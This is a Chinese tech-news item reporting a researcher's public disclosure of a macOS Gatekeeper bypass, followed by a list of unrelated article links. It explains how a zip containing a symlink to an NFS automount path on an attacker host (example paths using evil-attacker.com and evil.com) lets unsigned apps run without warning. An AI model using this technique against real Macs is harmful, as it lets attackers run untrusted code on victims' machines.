【虎嗅晚报】美团点评被北京消协约谈:部分外卖商家涉嫌严重违规
研究人员称:macOSGatekeeper安全机制中存在大漏洞
引述外媒报道,安全研究员Filippo Cavallarin已经公开了他所说的绕过macOS的Gatekeeper安全功能的方法。截至上周发布的macOS 10.14.5版本,苹果仍然没有解决旁路问题。
Gatekeeper是一种macOS安全工具,可在下载后立即验证应用程序。这可以防止应用程序在未经用户同意的情 当用户从Mac App Store外部下载应用程序时,Gatekeeper用于检查代码是否已由Apple签名。如果代码尚未签名,则在用户未授予权限的情况下,该应用程序将无法打开。
然而,Cavallarin 在他的博客上写道,Gatekeeper的功能可以被完全绕过。在当前的实现中,Gatekeeper将外部驱动器和网络共享视为“安全位置”。这意味着它允许运行这些位置中包含的任何应用程序而无需再次检查代码。他接着解释说,用户可以“轻易”欺骗安装网络共享驱动器,然后该文件夹中的任何内容都可以通过Gatekeeper。
安全研究员解释说:
第一个合法的功能是automount(aka autofs),它允许用户仅通过访问“特殊”路径(在这种情况下,以“/ net /”开头的任何路径)自动挂载网络共享。
例如,'ls /net/evil-attacker.com/sharedfolder/'将使os使用NFS读取远程主机(evil-attacker.com)上'sharedfolder'的内容。
第二个合法的功能是zip存档可以包含指向任意位置(包括automount enpoints)的符号链接,并且MacOS上负责解压缩zip文件的软件在创建它们之前不会对符号链接执行任何检查。
这是如何工作的一个例子:
为了更好地理解此漏洞利用的工作原理,让我们考虑以下场景:攻击者制作一个zip文件,其中包含一个指向她/他控制的automount端点的符号链接(来自Documents - > /net/evil.com/Documents)并将其发送到受害者。
受害者下载恶意档案,提取并遵循符号链接。
现在,受害者位于受攻击者控制但受Gatekeeper信任的位置,因此任何攻击者控制的可执行文件都可以在没有任何警告的情况下运行。设计Finder的方式(隐藏.app扩展,隐藏标题栏的完整路径)使得这个技术非常有效且难以发现。
Cavallarin表示,他于2月22日向Apple通报了这一漏洞,该公司应该在上周发布macOS 10.14.5时解决这个问题。然而,截至该版本,该漏洞仍未得到解决,Cavallarin称Apple已停止回复他的电子邮件。他正在宣传这个缺陷,因为他给苹果公司提供了90天的窗口。
显示全文
相关文章
-
-
B站现已支持AV1解码,但需要你手动切换
-
vivo&软通在渝设立离岸研发中心为两江新区增添数字经济发展新动能
-
区块链的2018 :走在冰与火之间
-
独家专访前美团COO干嘉伟:8年前,我看到未来互联网十人中有王兴
-
ipad打不出汉字怎么办
-
风雨飘摇二十年,MMO游戏还有春天吗?
-
阿里巴巴推政务钉钉;华为已同步启动6G研究|早8点档
-
面向对象和面向过程的本质区别
-
健力宝大败局:李经纬的双面人生
-
微信显示“正在输入”,其实不是在回复消息中,背后原因很“扎心”
-
罗永浩内测社交软件,ofo回应海外部门解散|天下网事1.10.
-
微商“救星”爱库存:打捞的只是微商回光返照的假象?
-
共享衣橱重视自我造血能力,「衣二三」扭亏为盈
-
Facebook称有数百万Instagram用户的密码被意外地存储在服务器上
-
神秘账号曝疑似刘强东案视频片段,称女方主动邀请刘强东进公寓
-
封面科技年度评选|新文创榜揭晓:B站、优酷、YY直播掀起文创经济新风潮
-
野蛮竞争后的唯品会,面对双十一成绩单仍含羞掩饰
-
腾讯音乐赴美上市,中国音乐产业进入国际化发展“零时差”
-
氪星晚报|微信称并未监测用户聊天记录;网易起诉抖音侵害作品信息网络传播权;小鹏汽车考虑赴美IPO
-
终于等到你!Chia关于近期新型P图工具等问题的正式回应!
-
快递员妻子病重 刘强东收回奖金还这样说
-
AI学术泰斗、千亿基金、独角兽云集,AIAED全球AI智适应教育峰会来了
-
人脸识别是技术的一次迭代解决根本问题要靠人
-
钛资本研究院:企业服务早期投资方法论
-
苹果手机喇叭有杂音怎么办
-
五年苹果经历安吉拉·阿伦茨学到了三件事
-
亚马逊中国大败退
-
信库巴就完了!美国任天堂总裁表示JC手柄持续改进中